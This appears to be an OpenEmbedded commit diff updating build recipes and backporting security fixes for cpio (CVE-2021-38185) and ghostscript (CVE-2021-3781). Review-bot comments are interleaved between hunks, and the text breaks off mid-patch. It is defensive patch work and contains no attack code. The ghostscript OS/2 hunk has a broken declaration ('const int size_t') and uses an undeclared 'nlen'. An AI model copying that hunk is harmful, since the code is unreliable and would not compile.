Diffstat (limited to 'meta/recipes-extended')
46 files changed, 2026 insertions, 63 deletions
diff --git a/meta/recipes-extended/asciidoc/asciidoc_9.1.0.bb b/meta/recipes-extended/asciidoc/asciidoc_9.1.0.bb index 523bf33f42..3869abee59 100644 --- a/meta/recipes-extended/asciidoc/asciidoc_9.1.0.bb +++ b/meta/recipes-extended/asciidoc/asciidoc_9.1.0.bb @@ -8,7 +8,7 @@ LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=4e5d1baf6f20559e3bec172226a47e4e \ file://LICENSE;md5=b234ee4d69f5fce4486a80fdaf4a4263 " -SRC_URI = "git://github.com/asciidoc/asciidoc-py3;protocol=https;branch=9.x" +SRC_URI = "git://github.com/asciidoc/asciidoc-py;protocol=https;branch=9.x" SRCREV = "9705d428439530104ce55d0ba12e8ef9d1b57ad1" DEPENDS = "libxml2-native libxslt-native docbook-xml-dtd4-native docbook-xsl-stylesheets-native" diff --git a/meta/recipes-extended/bash/bash.inc b/meta/recipes-extended/bash/bash.inc index d3e1dfdb30..37871bcdca 100644 --- a/meta/recipes-extended/bash/bash.inc +++ b/meta/recipes-extended/bash/bash.inc @@ -62,6 +62,11 @@ do_compile_ptest () { oe_runmake buildtest } +do_install_prepend () { + # Ensure determinism as this counter increases for each make call + rm -f ${B}/.build +} + do_install_append () { # Move /usr/bin/bash to /bin/bash, if need if [ "${base_bindir}" != "${bindir}" ]; then diff --git a/meta/recipes-extended/bzip2/bzip2/Makefile.am b/meta/recipes-extended/bzip2/bzip2/Makefile.am index 7338df03eb..d12d3a45e4 100644 --- a/meta/recipes-extended/bzip2/bzip2/Makefile.am +++ b/meta/recipes-extended/bzip2/bzip2/Makefile.am @@ -1,6 +1,6 @@ lib_LTLIBRARIES = libbz2.la -libbz2_la_LDFLAGS = -version-info 1:6:0 +libbz2_la_LDFLAGS = -version-info 1:8:0 libbz2_la_SOURCES = blocksort.c \ huffman.c \ diff --git a/meta/recipes-extended/bzip2/bzip2_1.0.8.bb b/meta/recipes-extended/bzip2/bzip2_1.0.8.bb index 70eb67f1f2..d2f34449b3 100644 --- a/meta/recipes-extended/bzip2/bzip2_1.0.8.bb +++ b/meta/recipes-extended/bzip2/bzip2_1.0.8.bb 
@@ -22,7 +22,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;beginline=4;endline=37;md5=600af43c50f1fcb82e " SRC_URI = "https://sourceware.org/pub/${BPN}/${BPN}-${PV}.tar.gz \ - git://sourceware.org/git/bzip2-tests.git;name=bzip2-tests \ + git://sourceware.org/git/bzip2-tests.git;name=bzip2-tests;branch=master \ file://configure.ac;subdir=${BP} \ file://Makefile.am;subdir=${BP} \ file://run-ptest \ diff --git a/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch new file mode 100644 index 0000000000..6ceafeee49 --- /dev/null +++ b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch 
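Review bot: The `bzip2-tests` entry in SRC_URI still fetches over the plain `git://` transport, because this hunk adds `branch=master` but no `protocol=https`, unlike the asciidoc, go-helloworld and iputils entries elsewhere in this diff. The git transport is unauthenticated and unencrypted, so integrity of the fetch rests entirely on the SRCREV pin, which is not visible in this hunk. If sourceware serves this repository over HTTPS, I would write the line as `git://sourceware.org/git/bzip2-tests.git;name=bzip2-tests;branch=master;protocol=https \`.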
@@ -0,0 +1,581 @@ +GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted +pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers +an out-of-bounds heap write. + +CVE: CVE-2021-38185 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From e494c68a3a0951b1eaba77e2db93f71a890e15d8 Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Sat, 7 Aug 2021 12:52:21 +0300 +Subject: [PATCH 1/3] Rewrite dynamic string support. + +* src/dstring.c (ds_init): Take a single argument. +(ds_free): New function. +(ds_resize): Take a single argument. Use x2nrealloc to expand +the storage. +(ds_reset,ds_append,ds_concat,ds_endswith): New function. +(ds_fgetstr): Rewrite. In particular, this fixes integer overflow. +* src/dstring.h (dynamic_string): Keep both the allocated length +(ds_size) and index of the next free byte in the string (ds_idx). +(ds_init,ds_resize): Change signature. +(ds_len): New macro. +(ds_free,ds_reset,ds_append,ds_concat,ds_endswith): New protos. +* src/copyin.c: Use new ds_ functions. +* src/copyout.c: Likewise. +* src/copypass.c: Likewise. +* src/util.c: Likewise. +--- + src/copyin.c | 40 +++++++++++------------ + src/copyout.c | 16 ++++----- + src/copypass.c | 34 +++++++++---------- + src/dstring.c | 88 ++++++++++++++++++++++++++++++++++++-------------- + src/dstring.h | 31 +++++++++--------- + src/util.c | 6 ++-- + 6 files changed, 123 insertions(+), 92 deletions(-) + +diff --git a/src/copyin.c b/src/copyin.c +index b29f348..37e503a 100644 +--- a/src/copyin.c ++++ b/src/copyin.c +@@ -55,11 +55,12 @@ query_rename(struct cpio_file_stat* file_hdr, FILE *tty_in, FILE *tty_out, + char *str_res; /* Result for string function. */ + static dynamic_string new_name; /* New file name for rename option. 
*/ + static int initialized_new_name = false; ++ + if (!initialized_new_name) +- { +- ds_init (&new_name, 128); +- initialized_new_name = true; +- } ++ { ++ ds_init (&new_name); ++ initialized_new_name = true; ++ } + + if (rename_flag) + { +@@ -779,37 +780,36 @@ long_format (struct cpio_file_stat *file_hdr, char const *link_name) + already in `save_patterns' (from the command line) are preserved. */ + + static void +-read_pattern_file () ++read_pattern_file (void) + { +- int max_new_patterns; +- char **new_save_patterns; +- int new_num_patterns; ++ char **new_save_patterns = NULL; ++ size_t max_new_patterns; ++ size_t new_num_patterns; + int i; +- dynamic_string pattern_name; ++ dynamic_string pattern_name = DYNAMIC_STRING_INITIALIZER; + FILE *pattern_fp; + + if (num_patterns < 0) + num_patterns = 0; +- max_new_patterns = 1 + num_patterns; +- new_save_patterns = (char **) xmalloc (max_new_patterns * sizeof (char *)); + new_num_patterns = num_patterns; +- ds_init (&pattern_name, 128); ++ max_new_patterns = num_patterns; ++ new_save_patterns = xcalloc (max_new_patterns, sizeof (new_save_patterns[0])); + + pattern_fp = fopen (pattern_file_name, "r"); + if (pattern_fp == NULL) + open_fatal (pattern_file_name); + while (ds_fgetstr (pattern_fp, &pattern_name, '\n') != NULL) + { +- if (new_num_patterns >= max_new_patterns) +- { +- max_new_patterns += 1; +- new_save_patterns = (char **) +- xrealloc ((char *) new_save_patterns, +- max_new_patterns * sizeof (char *)); +- } ++ if (new_num_patterns == max_new_patterns) ++ new_save_patterns = x2nrealloc (new_save_patterns, ++ &max_new_patterns, ++ sizeof (new_save_patterns[0])); + new_save_patterns[new_num_patterns] = xstrdup (pattern_name.ds_string); + ++new_num_patterns; + } ++ ++ ds_free (&pattern_name); ++ + if (ferror (pattern_fp) || fclose (pattern_fp) == EOF) + close_error (pattern_file_name); + +@@ -1196,7 +1196,7 @@ swab_array (char *ptr, int count) + in the file system. 
*/ + + void +-process_copy_in () ++process_copy_in (void) + { + char done = false; /* True if trailer reached. */ + FILE *tty_in = NULL; /* Interactive file for rename option. */ +diff --git a/src/copyout.c b/src/copyout.c +index 8b0beb6..26e3dda 100644 +--- a/src/copyout.c ++++ b/src/copyout.c +@@ -594,9 +594,10 @@ assign_string (char **pvar, char *value) + The format of the header depends on the compatibility (-c) flag. */ + + void +-process_copy_out () ++process_copy_out (void) + { +- dynamic_string input_name; /* Name of file read from stdin. */ ++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER; ++ /* Name of file read from stdin. */ + struct stat file_stat; /* Stat record for file. */ + struct cpio_file_stat file_hdr = CPIO_FILE_STAT_INITIALIZER; + /* Output header information. */ +@@ -605,7 +606,6 @@ process_copy_out () + char *orig_file_name = NULL; + + /* Initialize the copy out. */ +- ds_init (&input_name, 128); + file_hdr.c_magic = 070707; + + /* Check whether the output file might be a tape. */ +@@ -657,14 +657,9 @@ process_copy_out () + { + if (file_hdr.c_mode & CP_IFDIR) + { +- int len = strlen (input_name.ds_string); + /* Make sure the name ends with a slash */ +- if (input_name.ds_string[len-1] != '/') +- { +- ds_resize (&input_name, len + 2); +- input_name.ds_string[len] = '/'; +- input_name.ds_string[len+1] = 0; +- } ++ if (!ds_endswith (&input_name, '/')) ++ ds_append (&input_name, '/'); + } + } + +@@ -875,6 +870,7 @@ process_copy_out () + (unsigned long) blocks), (unsigned long) blocks); + } + cpio_file_stat_free (&file_hdr); ++ ds_free (&input_name); + } + + +diff --git a/src/copypass.c b/src/copypass.c +index dc13b5b..62f31c6 100644 +--- a/src/copypass.c ++++ b/src/copypass.c +@@ -48,10 +48,12 @@ set_copypass_perms (int fd, const char *name, struct stat *st) + If `link_flag', link instead of copying. */ + + void +-process_copy_pass () ++process_copy_pass (void) + { +- dynamic_string input_name; /* Name of file from stdin. 
*/ +- dynamic_string output_name; /* Name of new file. */ ++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER; ++ /* Name of file from stdin. */ ++ dynamic_string output_name = DYNAMIC_STRING_INITIALIZER; ++ /* Name of new file. */ + size_t dirname_len; /* Length of `directory_name'. */ + int res; /* Result of functions. */ + char *slash; /* For moving past slashes in input name. */ +@@ -65,25 +67,18 @@ process_copy_pass () + created files */ + + /* Initialize the copy pass. */ +- ds_init (&input_name, 128); + + dirname_len = strlen (directory_name); + if (change_directory_option && !ISSLASH (directory_name[0])) + { + char *pwd = xgetcwd (); +- +- dirname_len += strlen (pwd) + 1; +- ds_init (&output_name, dirname_len + 2); +- strcpy (output_name.ds_string, pwd); +- strcat (output_name.ds_string, "/"); +- strcat (output_name.ds_string, directory_name); ++ ++ ds_concat (&output_name, pwd); ++ ds_append (&output_name, '/'); + } +- else +- { +- ds_init (&output_name, dirname_len + 2); +- strcpy (output_name.ds_string, directory_name); +- } +- output_name.ds_string[dirname_len] = '/'; ++ ds_concat (&output_name, directory_name); ++ ds_append (&output_name, '/'); ++ dirname_len = ds_len (&output_name); + output_is_seekable = true; + + change_dir (); +@@ -116,8 +111,8 @@ process_copy_pass () + /* Make the name of the new file. 
*/ + for (slash = input_name.ds_string; *slash == '/'; ++slash) + ; +- ds_resize (&output_name, dirname_len + strlen (slash) + 2); +- strcpy (output_name.ds_string + dirname_len + 1, slash); ++ ds_reset (&output_name, dirname_len); ++ ds_concat (&output_name, slash); + + existing_dir = false; + if (lstat (output_name.ds_string, &out_file_stat) == 0) +@@ -333,6 +328,9 @@ process_copy_pass () + (unsigned long) blocks), + (unsigned long) blocks); + } ++ ++ ds_free (&input_name); ++ ds_free (&output_name); + } + + /* Try and create a hard link from FILE_NAME to another file +diff --git a/src/dstring.c b/src/dstring.c +index e9c063f..358f356 100644 +--- a/src/dstring.c ++++ b/src/dstring.c +@@ -20,8 +20,8 @@ + #if defined(HAVE_CONFIG_H) + # include <config.h> + #endif +- + #include <stdio.h> ++#include <stdlib.h> + #if defined(HAVE_STRING_H) || defined(STDC_HEADERS) + #include <string.h> + #else +@@ -33,24 +33,41 @@ + /* Initialiaze dynamic string STRING with space for SIZE characters. */ + + void +-ds_init (dynamic_string *string, int size) ++ds_init (dynamic_string *string) ++{ ++ memset (string, 0, sizeof *string); ++} ++ ++/* Free the dynamic string storage. */ ++ ++void ++ds_free (dynamic_string *string) + { +- string->ds_length = size; +- string->ds_string = (char *) xmalloc (size); ++ free (string->ds_string); + } + +-/* Expand dynamic string STRING, if necessary, to hold SIZE characters. */ ++/* Expand dynamic string STRING, if necessary. */ + + void +-ds_resize (dynamic_string *string, int size) ++ds_resize (dynamic_string *string) + { +- if (size > string->ds_length) ++ if (string->ds_idx == string->ds_size) + { +- string->ds_length = size; +- string->ds_string = (char *) xrealloc ((char *) string->ds_string, size); ++ string->ds_string = x2nrealloc (string->ds_string, &string->ds_size, ++ 1); + } + } + ++/* Reset the index of the dynamic string S to LEN. 
*/ ++ ++void ++ds_reset (dynamic_string *s, size_t len) ++{ ++ while (len > s->ds_size) ++ ds_resize (s); ++ s->ds_idx = len; ++} ++ + /* Dynamic string S gets a string terminated by the EOS character + (which is removed) from file F. S will increase + in size during the function if the string from F is longer than +@@ -61,34 +78,50 @@ ds_resize (dynamic_string *string, int size) + char * + ds_fgetstr (FILE *f, dynamic_string *s, char eos) + { +- int insize; /* Amount needed for line. */ +- int strsize; /* Amount allocated for S. */ + int next_ch; + + /* Initialize. */ +- insize = 0; +- strsize = s->ds_length; ++ s->ds_idx = 0; + + /* Read the input string. */ +- next_ch = getc (f); +- while (next_ch != eos && next_ch != EOF) ++ while ((next_ch = getc (f)) != eos && next_ch != EOF) + { +- if (insize >= strsize - 1) +- { +- ds_resize (s, strsize * 2 + 2); +- strsize = s->ds_length; +- } +- s->ds_string[insize++] = next_ch; +- next_ch = getc (f); ++ ds_resize (s); ++ s->ds_string[s->ds_idx++] = next_ch; + } +- s->ds_string[insize++] = '\0'; ++ ds_resize (s); ++ s->ds_string[s->ds_idx] = '\0'; + +- if (insize == 1 && next_ch == EOF) ++ if (s->ds_idx == 0 && next_ch == EOF) + return NULL; + else + return s->ds_string; + } + ++void ++ds_append (dynamic_string *s, int c) ++{ ++ ds_resize (s); ++ s->ds_string[s->ds_idx] = c; ++ if (c) ++ { ++ s->ds_idx++; ++ ds_resize (s); ++ s->ds_string[s->ds_idx] = 0; ++ } ++} ++ ++void ++ds_concat (dynamic_string *s, char const *str) ++{ ++ size_t len = strlen (str); ++ while (len + 1 > s->ds_size) ++ ds_resize (s); ++ memcpy (s->ds_string + s->ds_idx, str, len); ++ s->ds_idx += len; ++ s->ds_string[s->ds_idx] = 0; ++} ++ + char * + ds_fgets (FILE *f, dynamic_string *s) + { +@@ -100,3 +133,10 @@ ds_fgetname (FILE *f, dynamic_string *s) + { + return ds_fgetstr (f, s, '\0'); + } ++ ++/* Return true if the dynamic string S ends with character C. 
*/ ++int ++ds_endswith (dynamic_string *s, int c) ++{ ++ return (s->ds_idx > 0 && s->ds_string[s->ds_idx - 1] == c); ++} +diff --git a/src/dstring.h b/src/dstring.h +index b5135fe..f5b04ef 100644 +--- a/src/dstring.h ++++ b/src/dstring.h +@@ -17,10 +17,6 @@ + Software Foundation, Inc., 51 Franklin Street, Fifth Floor, + Boston, MA 02110-1301 USA. */ + +-#ifndef NULL +-#define NULL 0 +-#endif +- + /* A dynamic string consists of record that records the size of an + allocated string and the pointer to that string. The actual string + is a normal zero byte terminated string that can be used with the +@@ -30,22 +26,25 @@ + + typedef struct + { +- int ds_length; /* Actual amount of storage allocated. */ +- char *ds_string; /* String. */ ++ size_t ds_size; /* Actual amount of storage allocated. */ ++ size_t ds_idx; /* Index of the next free byte in the string. */ ++ char *ds_string; /* String storage. */ + } dynamic_string; + ++#define DYNAMIC_STRING_INITIALIZER { 0, 0, NULL } + +-/* Macros that look similar to the original string functions. +- WARNING: These macros work only on pointers to dynamic string records. +- If used with a real record, an "&" must be used to get the pointer. 
*/ +-#define ds_strlen(s) strlen ((s)->ds_string) +-#define ds_strcmp(s1, s2) strcmp ((s1)->ds_string, (s2)->ds_string) +-#define ds_strncmp(s1, s2, n) strncmp ((s1)->ds_string, (s2)->ds_string, n) +-#define ds_index(s, c) index ((s)->ds_string, c) +-#define ds_rindex(s, c) rindex ((s)->ds_string, c) ++void ds_init (dynamic_string *string); ++void ds_free (dynamic_string *string); ++void ds_reset (dynamic_string *s, size_t len); + +-void ds_init (dynamic_string *string, int size); +-void ds_resize (dynamic_string *string, int size); ++/* All functions below guarantee that s->ds_string[s->ds_idx] == '\0' */ + char *ds_fgetname (FILE *f, dynamic_string *s); + char *ds_fgets (FILE *f, dynamic_string *s); + char *ds_fgetstr (FILE *f, dynamic_string *s, char eos); ++void ds_append (dynamic_string *s, int c); ++void ds_concat (dynamic_string *s, char const *str); ++ ++#define ds_len(s) ((s)->ds_idx) ++ ++int ds_endswith (dynamic_string *s, int c); ++ +diff --git a/src/util.c b/src/util.c +index 4421b20..6d6bbaa 100644 +--- a/src/util.c ++++ b/src/util.c +@@ -846,11 +846,9 @@ get_next_reel (int tape_des) + FILE *tty_out; /* File for interacting with user. */ + int old_tape_des; + char *next_archive_name; +- dynamic_string new_name; ++ dynamic_string new_name = DYNAMIC_STRING_INITIALIZER; + char *str_res; + +- ds_init (&new_name, 128); +- + /* Open files for interactive communication. 
*/ + tty_in = fopen (TTY_NAME, "r"); + if (tty_in == NULL) +@@ -925,7 +923,7 @@ get_next_reel (int tape_des) + error (PAXEXIT_FAILURE, 0, _("internal error: tape descriptor changed from %d to %d"), + old_tape_des, tape_des); + +- free (new_name.ds_string); ++ ds_free (&new_name); + fclose (tty_in); + fclose (tty_out); + } +-- +2.25.1 + + +From fb7a51bf85b8e6f045cacb4fb783db4a414741bf Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Wed, 11 Aug 2021 18:10:38 +0300 +Subject: [PATCH 2/3] Fix previous commit + +* src/dstring.c (ds_reset,ds_concat): Don't call ds_resize in a +loop. +--- + src/dstring.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/src/dstring.c b/src/dstring.c +index 358f356..90c691c 100644 +--- a/src/dstring.c ++++ b/src/dstring.c +@@ -64,7 +64,7 @@ void + ds_reset (dynamic_string *s, size_t len) + { + while (len > s->ds_size) +- ds_resize (s); ++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); + s->ds_idx = len; + } + +@@ -116,7 +116,7 @@ ds_concat (dynamic_string *s, char const *str) + { + size_t len = strlen (str); + while (len + 1 > s->ds_size) +- ds_resize (s); ++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); + memcpy (s->ds_string + s->ds_idx, str, len); + s->ds_idx += len; + s->ds_string[s->ds_idx] = 0; +-- +2.25.1 + + +From 86b37d74b15f9bb5fe62fd1642cc126d3ace0189 Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Wed, 18 Aug 2021 09:41:39 +0300 +Subject: [PATCH 3/3] Fix dynamic string reallocations + +* src/dstring.c (ds_resize): Take additional argument: number of +bytes to leave available after ds_idx. All uses changed. +--- + src/dstring.c | 18 ++++++++---------- + 1 file changed, 8 insertions(+), 10 deletions(-) + +diff --git a/src/dstring.c b/src/dstring.c +index 90c691c..0f597cc 100644 +--- a/src/dstring.c ++++ b/src/dstring.c +@@ -49,9 +49,9 @@ ds_free (dynamic_string *string) + /* Expand dynamic string STRING, if necessary. 
*/ + + void +-ds_resize (dynamic_string *string) ++ds_resize (dynamic_string *string, size_t len) + { +- if (string->ds_idx == string->ds_size) ++ while (len + string->ds_idx >= string->ds_size) + { + string->ds_string = x2nrealloc (string->ds_string, &string->ds_size, + 1); +@@ -63,8 +63,7 @@ ds_resize (dynamic_string *string) + void + ds_reset (dynamic_string *s, size_t len) + { +- while (len > s->ds_size) +- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); ++ ds_resize (s, len); + s->ds_idx = len; + } + +@@ -86,10 +85,10 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos) + /* Read the input string. */ + while ((next_ch = getc (f)) != eos && next_ch != EOF) + { +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx++] = next_ch; + } +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx] = '\0'; + + if (s->ds_idx == 0 && next_ch == EOF) +@@ -101,12 +100,12 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos) + void + ds_append (dynamic_string *s, int c) + { +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx] = c; + if (c) + { + s->ds_idx++; +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx] = 0; + } + } +@@ -115,8 +114,7 @@ void + ds_concat (dynamic_string *s, char const *str) + { + size_t len = strlen (str); +- while (len + 1 > s->ds_size) +- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); ++ ds_resize (s, len); + memcpy (s->ds_string + s->ds_idx, str, len); + s->ds_idx += len; + s->ds_string[s->ds_idx] = 0; +-- +2.25.1 + diff --git a/meta/recipes-extended/cpio/cpio_2.13.bb b/meta/recipes-extended/cpio/cpio_2.13.bb index f4df826ed9..f3f2be17df 100644 --- a/meta/recipes-extended/cpio/cpio_2.13.bb +++ b/meta/recipes-extended/cpio/cpio_2.13.bb 
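Review bot: In the rewritten `process_copy_pass` block of patch 1/3, the result of `xgetcwd ()` goes straight into `ds_concat`, which calls `strlen (str)`, and it is never freed. If `xgetcwd` can return NULL here (gnulib's version does for failures other than out-of-memory), that is a NULL dereference when the working directory is unreadable or has been removed. The removed `strlen (pwd)`/`strcpy` code had the same gap, so the backport does not regress it, but I would add `if (!pwd) error (PAXEXIT_FAILURE, errno, _("cannot determine current directory"));` before the `ds_concat` and `free (pwd);` after the `ds_append`. Separately, `ds_free` releases `ds_string` without clearing `ds_size` and `ds_idx`, so a comment such as `/* S must not be passed to any ds_ function after ds_free unless ds_init is called first. */` would document the contract. The visible callers free only at function exit, and `process_copy_pass` continues outside the embedded hunks.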
@@ -9,6 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f27defe1e96c2e1ecd4e0c9be8967949" SRC_URI = "${GNU_MIRROR}/cpio/cpio-${PV}.tar.gz \ file://0001-Unset-need_charset_alias-when-building-for-musl.patch \ file://0002-src-global.c-Remove-superfluous-declaration-of-progr.patch \ + file://CVE-2021-38185.patch \ " SRC_URI[md5sum] = "389c5452d667c23b5eceb206f5000810" diff --git a/meta/recipes-extended/cups/cups.inc b/meta/recipes-extended/cups/cups.inc index beee614828..a667d1a142 100644 --- a/meta/recipes-extended/cups/cups.inc +++ b/meta/recipes-extended/cups/cups.inc @@ -44,7 +44,7 @@ PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'zeroconf', 'avahi', PACKAGECONFIG[avahi] = "--enable-avahi,--disable-avahi,avahi" PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl" PACKAGECONFIG[pam] = "--enable-pam --with-pam-module=unix, --disable-pam, libpam" -PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--without-systemd,systemd" +PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--disable-systemd,systemd" PACKAGECONFIG[xinetd] = "--with-xinetd=${sysconfdir}/xinetd.d,--without-xinetd,xinetd" EXTRA_OECONF = " \ diff --git a/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-704342-Include-device-specifier-strings-in-acces.patch b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-704342-Include-device-specifier-strings-in-acces.patch new file mode 100644 index 0000000000..44bdfbba35 --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-704342-Include-device-specifier-strings-in-acces.patch 
@@ -0,0 +1,238 @@ +From a9bd3dec9fde03327a4a2c69dad1036bf9632e20 Mon Sep 17 00:00:00 2001 +From: Chris Liddell <chris.liddell@artifex.com> +Date: Tue, 7 Sep 2021 20:36:12 +0100 +Subject: [PATCH] Bug 704342: Include device specifier strings in access + validation + +for the "%pipe%", %handle%" and %printer% io devices. + +We previously validated only the part after the "%pipe%" Postscript device +specifier, but this proved insufficient. + +This rebuilds the original file name string, and validates it complete. The +slight complication for "%pipe%" is it can be reached implicitly using +"|" so we have to check both prefixes. + +Addresses CVE-2021-3781 + +CVE: CVE-2021-3781 + +Upstream-Status: Backport (http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=a9bd3dec9fde03327a4a2c69dad1036bf9632e20) + +Signed-off-by: Trevor Gamblin <trevor.gamblin@windriver.com> +--- + base/gdevpipe.c | 22 +++++++++++++++- + base/gp_mshdl.c | 11 +++++++- + base/gp_msprn.c | 10 ++++++- + base/gp_os2pr.c | 13 +++++++++- + base/gslibctx.c | 69 ++++++++++--------------------------------------- + 5 files changed, 65 insertions(+), 60 deletions(-) + +diff --git a/base/gdevpipe.c b/base/gdevpipe.c +index 96d71f5d8..5bdc485be 100644 +--- a/base/gdevpipe.c ++++ b/base/gdevpipe.c +@@ -72,8 +72,28 @@ pipe_fopen(gx_io_device * iodev, const char *fname, const char *access, + #else + gs_lib_ctx_t *ctx = mem->gs_lib_ctx; + gs_fs_list_t *fs = ctx->core->fs; ++ /* The pipe device can be reached in two ways, explicltly with %pipe% ++ or implicitly with "|", so we have to check for both ++ */ ++ char f[gp_file_name_sizeof]; ++ const char *pipestr = "|"; ++ const size_t pipestrlen = strlen(pipestr); ++ const size_t preflen = strlen(iodev->dname); ++ const size_t nlen = strlen(fname); ++ int code1; ++ ++ if (preflen + nlen >= gp_file_name_sizeof) ++ return_error(gs_error_invalidaccess); ++ ++ memcpy(f, iodev->dname, preflen); ++ memcpy(f + preflen, fname, nlen + 1); ++ ++ code1 = gp_validate_path(mem, f, 
access); ++ ++ memcpy(f, pipestr, pipestrlen); ++ memcpy(f + pipestrlen, fname, nlen + 1); + +- if (gp_validate_path(mem, fname, access) != 0) ++ if (code1 != 0 && gp_validate_path(mem, f, access) != 0 ) + return gs_error_invalidfileaccess; + + /* +diff --git a/base/gp_mshdl.c b/base/gp_mshdl.c +index 2b964ed74..8d87ceadc 100644 +--- a/base/gp_mshdl.c ++++ b/base/gp_mshdl.c +@@ -95,8 +95,17 @@ mswin_handle_fopen(gx_io_device * iodev, const char *fname, const char *access, + long hfile; /* Correct for Win32, may be wrong for Win64 */ + gs_lib_ctx_t *ctx = mem->gs_lib_ctx; + gs_fs_list_t *fs = ctx->core->fs; ++ char f[gp_file_name_sizeof]; ++ const size_t preflen = strlen(iodev->dname); ++ const size_t nlen = strlen(fname); + +- if (gp_validate_path(mem, fname, access) != 0) ++ if (preflen + nlen >= gp_file_name_sizeof) ++ return_error(gs_error_invalidaccess); ++ ++ memcpy(f, iodev->dname, preflen); ++ memcpy(f + preflen, fname, nlen + 1); ++ ++ if (gp_validate_path(mem, f, access) != 0) + return gs_error_invalidfileaccess; + + /* First we try the open_handle method. */ +diff --git a/base/gp_msprn.c b/base/gp_msprn.c +index ed4827968..746a974f7 100644 +--- a/base/gp_msprn.c ++++ b/base/gp_msprn.c +@@ -168,8 +168,16 @@ mswin_printer_fopen(gx_io_device * iodev, const char *fname, const char *access, + uintptr_t *ptid = &((tid_t *)(iodev->state))->tid; + gs_lib_ctx_t *ctx = mem->gs_lib_ctx; + gs_fs_list_t *fs = ctx->core->fs; ++ const size_t preflen = strlen(iodev->dname); ++ const size_t nlen = strlen(fname); + +- if (gp_validate_path(mem, fname, access) != 0) ++ if (preflen + nlen >= gp_file_name_sizeof) ++ return_error(gs_error_invalidaccess); ++ ++ memcpy(pname, iodev->dname, preflen); ++ memcpy(pname + preflen, fname, nlen + 1); ++ ++ if (gp_validate_path(mem, pname, access) != 0) + return gs_error_invalidfileaccess; + + /* First we try the open_printer method. 
*/ +diff --git a/base/gp_os2pr.c b/base/gp_os2pr.c +index f852c71fc..ba54cde66 100644 +--- a/base/gp_os2pr.c ++++ b/base/gp_os2pr.c +@@ -107,9 +107,20 @@ os2_printer_fopen(gx_io_device * iodev, const char *fname, const char *access, + FILE ** pfile, char *rfname, uint rnamelen) + { + os2_printer_t *pr = (os2_printer_t *)iodev->state; +- char driver_name[256]; ++ char driver_name[gp_file_name_sizeof]; + gs_lib_ctx_t *ctx = mem->gs_lib_ctx; + gs_fs_list_t *fs = ctx->core->fs; ++ const size_t preflen = strlen(iodev->dname); ++ const int size_t = strlen(fname); ++ ++ if (preflen + nlen >= gp_file_name_sizeof) ++ return_error(gs_error_invalidaccess); ++ ++ memcpy(driver_name, iodev->dname, preflen); ++ memcpy(driver_name + preflen, fname, nlen + 1); ++ ++ if (gp_validate_path(mem, driver_name, access) != 0) ++ return gs_error_invalidfileaccess; + + /* First we try the open_printer method. */ + /* Note that the loop condition here ensures we don't +diff --git a/base/gslibctx.c b/base/gslibctx.c +index 6dfed6cd5..318039fad 100644 +--- a/base/gslibctx.c ++++ b/base/gslibctx.c +@@ -655,82 +655,39 @@ rewrite_percent_specifiers(char *s) + int + gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname) + { +- char *fp, f[gp_file_name_sizeof]; +- const int pipe = 124; /* ASCII code for '|' */ +- const int len = strlen(fname); +- int i, code; ++ char f[gp_file_name_sizeof]; ++ int code; + + /* Be sure the string copy will fit */ +- if (len >= gp_file_name_sizeof) ++ if (strlen(fname) >= gp_file_name_sizeof) + return gs_error_rangecheck; + strcpy(f, fname); +- fp = f; + /* Try to rewrite any %d (or similar) in the string */ + rewrite_percent_specifiers(f); +- for (i = 0; i < len; i++) { +- if (f[i] == pipe) { +- fp = &f[i + 1]; +- /* Because we potentially have to check file permissions at two levels +- for the output file (gx_device_open_output_file and the low level +- fopen API, if we're using a pipe, we have to add both the full string, +- (including the '|', and 
